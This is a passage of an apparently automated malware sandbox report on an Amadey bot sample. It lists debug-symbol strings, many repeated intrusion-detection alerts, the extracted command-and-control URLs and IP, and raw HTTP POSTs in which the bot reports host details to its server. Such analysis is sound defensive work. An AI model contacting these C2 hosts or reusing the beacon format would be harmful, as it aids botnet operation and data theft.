              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49732 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49734 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49731 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49736 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49743 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49738 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49746 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49748 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49740 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49752 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49739 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49741 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49757 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49747 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49760 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49735 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49756 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49753 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49764 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49766 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49733 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49773 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49777 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49781 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49779 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49785 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49791 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49768 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49763 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49775 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49778 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49761 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49782 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49799 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49784 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49798 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49808 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49802 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49789 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49737 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49806 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49841 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49809 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49730 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49776 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49765 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49769 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49787 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49804 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49783 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49774 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49794 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49803 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49790 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49800 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49826 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49856 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49801 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49780 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49793 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49759 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49849 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49762 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49871 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49767 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49840 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49880 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49844 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49810 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49865 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49895 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49889 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49866 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49770 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49795 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49911 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49788 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49792 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49873 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49899 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49898 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49888 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49771 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49829 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49857 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49816 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49744 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49890 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49914 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49860 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49883 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49772 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49906 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49825 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49913 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49755 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49797 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49897 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49905 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49881 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49850 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49817 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49750 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49786 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49824 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49921 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49874 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49858 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49872 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49796 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49818 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49833 -> 72.52.178.23:80
              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49843 -> 72.52.178.23:80
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeNetwork Connect: 72.52.178.23 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: web.jsonpost.xyz/sj2vMs/index.php
              Source: Malware configuration extractorURLs: web.xmlpost.xyz/sj2vMs/index.php
              Performs DNS queries to domains with low reputation
              Source: DNS query: web.jsonpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
